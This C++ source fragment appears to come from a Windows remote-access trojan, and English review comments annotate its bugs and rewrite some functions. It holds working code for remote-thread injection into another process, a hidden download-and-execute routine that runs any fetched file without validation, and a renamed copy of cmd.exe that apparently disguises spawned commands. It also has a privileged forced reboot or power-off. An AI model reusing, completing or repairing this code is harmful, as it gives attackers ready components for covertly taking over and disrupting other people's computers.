DWORD dwParamSize,
DWORD dwMilliseconds
//等待远线程结束:INFINITE:无限等待,结束后释放远线程内存(用于非阻塞函数)
//如果为0,不等待而直接返回,而且不释放远线程内存(用于阻塞函数)
)
{
// if( PID < 1 || dwFuncSize < 1 || pfnRemoteFunc == NULL )
//return FALSE;
//HANDLE hProc = NULL;
//HANDLE hProc = hProcess;
void* pfnRmtFunc = NULL;
void* pRmtParam = NULL;
HANDLE hRemoteThread = NULL;
DWORD dwThreadId = NULL;
DWORD dwExitCode = NULL;
BOOL bFlag;
// //=======打开进程========
// hProcess = OpenProcess( PROCESS_CREATE_THREAD| //允许远程创建线程
//PROCESS_VM_OPERATION| //允许远程VM操作
//PROCESS_VM_WRITE, //允许远程VM写
//FALSE,
//PID);
// if( !hProcess )
// {
//// TraceD("OpenProcess() %s", GetErrorMessage(GetLastError()) );
// goto InjectCleanUp;
// }
//=======函数=======
pfnRmtFunc = VirtualAllocEx( hProcess, NULL, dwFuncSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if( !pfnRmtFunc )
{
// TraceD("VirtualAllocEx() %s", GetErrorMessage(GetLastError()) );
goto InjectCleanUp;
}
//=======参数=======
pRmtParam = VirtualAllocEx( hProcess, NULL, dwParamSize, MEM_COMMIT, PAGE_READWRITE);
if( !pRmtParam )
{
// TraceD("VirtualAllocEx() %s\r\n", GetErrorMessage(GetLastError()) );
goto InjectCleanUp;
}
bFlag = WriteProcessMemory( hProcess, pfnRmtFunc, (PVOID)pfnRemoteFunc, dwFuncSize, 0);
if( bFlag == FALSE )
{
// TraceD("WriteProcessMemory() %s\r\n", GetErrorMessage(GetLastError()) );
goto InjectCleanUp;
}
bFlag = WriteProcessMemory( hProcess, pRmtParam, (PVOID)pRemoteParam, dwParamSize, 0);
if( bFlag == FALSE )
{
// TraceD("WriteProcessMemory() %s\r\n", GetErrorMessage(GetLastError()) );
goto InjectCleanUp;
}
//=======执行远线程=======
hRemoteThread = CreateRemoteThread( hProcess,
NULL,
0,
(LPTHREAD_START_ROUTINE)pfnRmtFunc,
(LPVOID)pRmtParam,
0,
&dwThreadId);
if( !hRemoteThread )
{
// TraceD("CreateRemoteThread() %s\r\n", GetErrorMessage(GetLastError()) );
goto InjectCleanUp;
}
else
{
// TraceD("Inject OK!\r\npfnRemoteFunc:%08X\r\npRmtParam:%08X\r\n", pfnRmtFunc, pRmtParam);
dbglog("创建远程线程成功。开启工作线程以连接客户端。");
}
WaitForSingleObject( hRemoteThread, dwMilliseconds );
GetExitCodeThread( hRemoteThread, &dwExitCode );
CloseHandle( hProcess );
if(dwMilliseconds != 0)
{
VirtualFree( pfnRmtFunc, 0, MEM_RELEASE);
dbglog("释放 Loader 对象成功");
// VirtualFree( pRmtParam, 0, MEM_RELEASE);
}
CloseHandle( hRemoteThread );
return dwExitCode;
InjectCleanUp:
if( hProcess ) CloseHandle( hProcess );
if( pfnRmtFunc ) VirtualFree( pfnRmtFunc, 0, MEM_RELEASE);
// if( pRmtParam ) VirtualFree( pRmtParam, 0, MEM_RELEASE);
if( hRemoteThread ) CloseHandle( hRemoteThread );
return 0;
}
// Launches szFile through the shell "open" verb, passing szlp as the
// argument string, szDir as the working directory and dwShow as the
// window state. Two COpenDesktop guards (a project type not visible in
// this file) live for the duration of the call; whatever their
// constructor/destructor do happens around the launch.
// NOTE(review): the result of ShellExecute is discarded, so this always
// reports true, even when the launch fails.
bool RunFile(LPCWSTR szFile, LPCWSTR szlp , LPCWSTR szDir , DWORD dwShow )
{
    COpenDesktop desktopGuardPrimary;
    COpenDesktop desktopGuardSecondary;
    (void)::ShellExecute(NULL, L"open", szFile, szlp, szDir, dwShow);
    return true;
}
// Runs szFile via a *renamed copy* of cmd.exe: copies <SystemDirectory>\cmd.exe
// to <SystemDirectory>\kmd.exe, then starts `kmd.exe /c "szFile" "szlp"` as a
// hidden process with c:\ as its working directory.
// Returns false only if CreateProcess fails; every other failure is silent.
// Parameters szDir and dwShow are accepted but never used.
// NOTE(review): the source gives no reason for cloning cmd.exe under another
// name; presumably so the child does not appear as "cmd.exe" in process
// listings - intent not stated here, verify against the rest of the project.
bool RunFileEx(LPCWSTR szFile, LPCWSTR szlp , LPCWSTR szDir , DWORD dwShow )
{
PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo; //This is an [in] parameter
ZeroMemory(&StartupInfo, sizeof(StartupInfo));
StartupInfo.cb = sizeof(StartupInfo); //Only compulsory field
// Child is placed on the interactive desktop explicitly.
StartupInfo.lpDesktop=L"WinSta0\\Default";
// NOTE(review): STARTF_USESTDHANDLES is set but hStdInput/hStdOutput/hStdError
// are never assigned (they stay zero from ZeroMemory), so the child gets
// NULL standard handles rather than inheriting ours.
StartupInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES ;
// NOTE(review): szCmd is a fixed 512-WCHAR stack buffer, but the wsprintf
// below inserts two caller-supplied strings with no length check - a long
// szFile/szlp overruns it (wsprintf itself only stops at 1024 characters).
WCHAR szCmd[512] = {0};
WCHAR cmdline[MAX_PATH];
WCHAR Kmdline[MAX_PATH];
GetSystemDirectory(cmdline,MAX_PATH);
GetSystemDirectory(Kmdline,MAX_PATH);
lstrcatW(cmdline,L"\\cmd.exe");
lstrcatW(Kmdline,L"\\kmd.exe");
// Re-create the kmd.exe copy every call; results of DeleteFile/CopyFile
// are ignored (CopyFile's third argument NULL == FALSE, i.e. overwrite),
// so a failed copy still proceeds to CreateProcess.
DeleteFile(Kmdline);
CopyFile(cmdline,Kmdline,NULL);
// "kmd.exe" is given without a path and lpApplicationName is NULL, so
// CreateProcess resolves it via its search order (the system directory is
// on it - verify). ThreadDownFile passes szlp == NULL here; wsprintf is
// expected to substitute "(null)" for a NULL %s - verify on the target OS.
wsprintf(szCmd, L"kmd.exe /c \"%s\" \"%s\"", szFile, szlp);
StartupInfo.wShowWindow = SW_HIDE;
// NOTE(review): szP is dead code - copied and never read. lstrcpy with a
// NULL source (see ThreadDownFile) is reported to be caught by lstrcpy's
// internal exception handler rather than crashing - verify.
WCHAR szP[MAX_PATH] = {0};
lstrcpy(szP, szlp);
if(CreateProcess(NULL, szCmd,
NULL,NULL,FALSE,0,NULL,
L"c:\\",&StartupInfo,&ProcessInfo))
{
// Handles are closed immediately; the child is not waited for.
CloseHandle(ProcessInfo.hThread);
CloseHandle(ProcessInfo.hProcess);
}
else
return false;
return true;
}
// Fetches szUrl with WinINet and, optionally, writes the raw bytes to szPath
// and/or appends them (converted ANSI->wide) to *pRet. Either output may be
// NULL. Returns false only when InternetOpen/InternetOpenUrl fail; an
// unreadable response, a failed _wfopen, or a zero-byte body still return true.
// NOTE(review): nothing here validates what is downloaded - no size limit, no
// hash/signature check, no HTTP status check - and ThreadDownFile executes the
// result. InternetOpenUrl is generally reported not to fail on 4xx/5xx, so an
// error page can end up saved as the "file" - verify.
bool DownFile(LPCWSTR szUrl, LPCWSTR szPath , std::wstring* pRet)
{
TCHAR szHead[] = _T("Accept: */*\r\n\r\n");
// The User-Agent is the current tick count rendered as a decimal string.
// NOTE(review): szAgent holds 10 TCHARs. GetTickCount() reaches 10 digits
// after ~11.6 days of uptime (11 chars with the terminator) and, printed
// with %d, values >= 2^31 gain a '-' sign (12 chars) - a stack overrun.
TCHAR szAgent[10] = {0};
wsprintf(szAgent, L"%d", GetTickCount());
// Access type 0 == INTERNET_OPEN_TYPE_PRECONFIG: proxy settings come from
// the user's configured (IE/WinINet) settings - verify.
HINTERNET hInternet = ::InternetOpen(szAgent, 0, NULL, NULL, 0);
if(hInternet == NULL)
return false;
// Bypass every cache layer so each call really hits the server.
HINTERNET hConnect = InternetOpenUrl(hInternet , szUrl, szHead, lstrlen(szHead), INTERNET_FLAG_DONT_CACHE | INTERNET_FLAG_PRAGMA_NOCACHE | INTERNET_FLAG_RELOAD, 0);
if(hConnect == NULL)
{
InternetCloseHandle(hInternet);
return false;
}
char buf[16 * 1024];
// NOTE(review): len is never initialised and InternetReadFile's return value
// is ignored; the loop only ends when len reads as 0, so termination on a
// read error depends on the API zeroing len - verify.
DWORD len ;
FILE* fp = NULL;
if(szPath)
fp = _wfopen(szPath, L"wb");
while(true)
{
// Zero-fill plus reading at most sizeof(buf)-1 keeps buf NUL-terminated
// for the CA2W conversion below.
memset(buf, 0, sizeof(buf));
::InternetReadFile(hConnect, buf, sizeof(buf)-1, &len);
if(!len)
break;
if(fp)
fwrite(buf, 1, len, fp);
// NOTE(review): CA2W treats each chunk as a NUL-terminated ANSI string, so
// a body containing a NUL byte is truncated at that byte, and a multibyte
// sequence straddling a 16 KiB chunk boundary is converted incorrectly.
if(pRet)
*pRet += ATL::CA2W(buf);
}
if(fp)
fclose(fp);
InternetCloseHandle(hConnect);
InternetCloseHandle(hInternet);
return true;
}
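// Splits szFile at its LAST forward slash ('/'):
//   *strName <- the text after that slash (empty if szFile ends in '/')
//   *strPath <- the text up to and including that slash
// Either output pointer may be NULL. A NULL or empty szFile leaves both
// outputs untouched (same as the original's early return).
// Only '/' is treated as a separator, as before - the caller in this file
// (ThreadDownFile) passes URLs - so backslash paths are NOT split.
// Fixes vs. the original: (1) a string with no '/' made _tcsrchr return NULL
// and the code dereferenced NULL+1; now the whole string is the name and the
// path is empty. (2) the path was copied through a fixed MAX_PATH stack
// buffer, overrunning it for longer inputs; std::wstring is used instead.
// (LPCWSTR is spelled as const wchar_t* here; the type is the same.)
void GetNameByFullPath(const wchar_t* szFile, std::wstring* strName, std::wstring* strPath)
{
    if (szFile == nullptr || *szFile == L'\0')
        return;

    const std::wstring full(szFile);
    const std::wstring::size_type slash = full.rfind(L'/');
    // Index just past the last '/', or 0 when there is none.
    const std::wstring::size_type nameStart =
        (slash == std::wstring::npos) ? 0 : slash + 1;

    if (strName)
        *strName = full.substr(nameStart);
    if (strPath)
        *strPath = full.substr(0, nameStart);
}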
// Heap-allocated argument record handed from CreateThreadDownFile to
// ThreadDownFile, which owns and deletes it.
struct tagDownFile
{
// URL to fetch. Fixed MAX_PATH buffer; CreateThreadDownFile fills it with an
// unbounded lstrcpy, so the caller must keep URLs shorter than MAX_PATH.
WCHAR szPath[MAX_PATH];
};
// Thread body started by CreateThreadDownFile: download-and-execute.
// Takes ownership of the tagDownFile passed as lp, derives a file name from
// the URL, fetches the URL to <CStartAggregate::m_strTempPath + name> and
// runs that file through RunFileEx. Always returns 0.
// NOTE(review): DownFile's result is ignored, so RunFileEx is attempted even
// when nothing was downloaded. CStartAggregate is a project type not visible
// here; m_strTempPath is presumably a directory prefix with a trailing
// separator (the name is appended with no separator) - verify.
DWORD WINAPI ThreadDownFile(LPVOID lp)
{
tagDownFile* pInfo = (tagDownFile*)lp;
std::wstring strName;
std::wstring strPath;
// strPath is computed but never used.
GetNameByFullPath(pInfo->szPath, &strName, &strPath);
CStartAggregate hStart;
// hStart.m_strWindowsPath += strName;
hStart.m_strTempPath += strName;
DownFile(pInfo->szPath, hStart.m_strTempPath.c_str(), NULL);
// szlp/szDir NULL, dwShow 0: RunFileEx formats the NULL szlp into its
// command line (see the note there) and ignores szDir/dwShow anyway.
RunFileEx(hStart.m_strTempPath.c_str(), NULL, NULL, NULL);
// Matches the `new` in CreateThreadDownFile.
delete pInfo;
return 0;
}
// Fire-and-forget: copies szUrl into a heap tagDownFile and starts
// ThreadDownFile on it (download + execute; the thread frees the record).
// NOTE(review): lstrcpy into the MAX_PATH-sized szPath has no bound, so a
// URL of MAX_PATH characters or more overruns the heap block. The thread
// handle returned by CreateThread is never closed, and if CreateThread fails
// pInfo is leaked; neither failure is reported to the caller.
void CreateThreadDownFile(LPCWSTR szUrl)
{
tagDownFile* pInfo = new tagDownFile;
lstrcpy(pInfo->szPath, szUrl);
CreateThread(NULL, 0, ThreadDownFile, pInfo, 0, NULL);
}
// Enables SE_SHUTDOWN_NAME on an impersonation token for the current thread
// and then powers off (Flag != 0) or reboots (Flag == 0) the machine.
// NOTE(review): none of LookupPrivilegeValue / OpenThreadToken /
// AdjustTokenPrivileges / ExitWindowsEx is checked. m_handle is uninitialised,
// so if OpenThreadToken fails AdjustTokenPrivileges receives garbage. The
// token handle is never closed and the impersonation is never reverted
// (no RevertToSelf), so the thread keeps running impersonated afterwards.
void ShutDownSystem(BOOL Flag)
{
TOKEN_PRIVILEGES tp;
LUID luid;
tp.PrivilegeCount = 1;
HANDLE m_handle;
HANDLE hThread = GetCurrentThread();
LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&luid);
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
// ImpersonateSelf gives the thread its own token so that OpenThreadToken
// below has something to open; the privilege is adjusted on that copy.
ImpersonateSelf(SecurityImpersonation);
OpenThreadToken(hThread,
TOKEN_ADJUST_PRIVILEGES,TRUE,&m_handle);
AdjustTokenPrivileges(m_handle,FALSE,&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES) NULL, (PDWORD) NULL);
// BUG(review): ExitWindowsEx(UINT uFlags, DWORD dwReason) - EWX_FORCE is
// passed as the *reason code*, not OR'ed into uFlags, so the shutdown is
// not actually forced. A forced shutdown would be
//   ExitWindowsEx(EWX_POWEROFF | EWX_FORCE, <SHTDN_REASON_* code>).
if(Flag)
ExitWindowsEx(EWX_POWEROFF,EWX_FORCE);
else
ExitWindowsEx(EWX_REBOOT,EWX_FORCE);
}
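// Returns the PID of the first running process whose image name equals
// exename (case-insensitive, compared against PROCESSENTRY32::szExeFile,
// i.e. a bare file name such as L"notepad.exe"), or 0 when there is no
// match, exename is NULL, or the Toolhelp snapshot cannot be taken.
// Fixes vs. the original: the snapshot handle and Process32First were not
// checked, so a failed snapshot walked an uninitialised PROCESSENTRY32.
DWORD QueryProcessByName(LPCWSTR exename)
{
    if (exename == NULL)
        return 0;

    // Toolhelp reports failure with INVALID_HANDLE_VALUE, not NULL.
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE)
        return 0;

    PROCESSENTRY32 entry;
    entry.dwSize = sizeof(PROCESSENTRY32);   // required before Process32First

    DWORD pid = 0;
    if (Process32First(snapshot, &entry))
    {
        do
        {
            if (_wcsicmp(exename, entry.szExeFile) == 0)
            {
                pid = entry.th32ProcessID;
                break;   // first match wins, as before
            }
        } while (Process32Next(snapshot, &entry));
    }

    CloseHandle(snapshot);   // single exit: the handle is always released
    return pid;
}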
// Scans top-level windows of class "#32770" (the standard dialog-box class)
// and reports whether any title *contains* WindowName (case-sensitive
// wcsstr). Despite the DWORD return type it returns 1 (true) when a match
// is found and 0 otherwise - it does not return the HWND.
// NOTE(review): WindowName must not be NULL (wcsstr would dereference it).
// Titles are read into a 100-TCHAR buffer, so only the first 99 characters
// of a long title are searched. The COpenDesktop locals inside the loop
// shadow the two outside it and are constructed/destroyed on every
// iteration; COpenDesktop is a project type whose effect is not visible here.
DWORD QueryWindowByName(LPCWSTR WindowName)
{
TCHAR strTitle[100];
HWND hwnd=NULL;
HWND AfterHwnd = NULL;
COpenDesktop hDesktop;
COpenDesktop hDesktop1;
while(true)
{
COpenDesktop hDesktop;
COpenDesktop hDesktop1;
// Walk siblings: each call resumes after the previously found window.
hwnd=::FindWindowEx(NULL,AfterHwnd,L"#32770",NULL);
if(!hwnd)
{
break;
}
else
{
if(::GetWindowText(hwnd,strTitle, 100))
if(wcsstr( strTitle, WindowName)!=0)
{
// Action to take once the window is found (currently just report it).
return true;// return success (1 as a DWORD)
}
}
AfterHwnd = hwnd;
}
return 0;
}
// Debug logger - currently a no-op. The original implementation is kept
// below, commented out, for reference: it prefixed str with the local time,
// emitted the line via OutputDebugStringA and appended it to
// <SystemDirectory>\NTboot.log (a useful artifact to know about even though
// this build writes nothing).
void dbglog(char* str)
{
    (void)str;   // nothing is written anywhere in this build
//HANDLE filefp;
//DWORD byteswritten;
//char str1[2048];
//SYSTEMTIME time;
//char exename[512];
//char LOG_PATH[512];
//GetSystemDirectoryA(LOG_PATH,512);
//strcat(LOG_PATH,"\\NTboot.log");
/////
//GetSystemDirectoryA(exename,512);
//SetCurrentDirectoryA(exename);
//GetLocalTime(&time);
//GetTimeFormatA(LOCALE_USER_DEFAULT,0,&time,0,str1,1024);
//strcat(str1," : ");
//strcat(str1,str);
//OutputDebugStringA(str1);
//filefp=CreateFileA(LOG_PATH,GENERIC_WRITE,0,0,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
//SetFilePointer(filefp,0,0,FILE_END);
//WriteFile(filefp,str1,strlen(str1),&byteswritten,0);
//CloseHandle(filefp);
}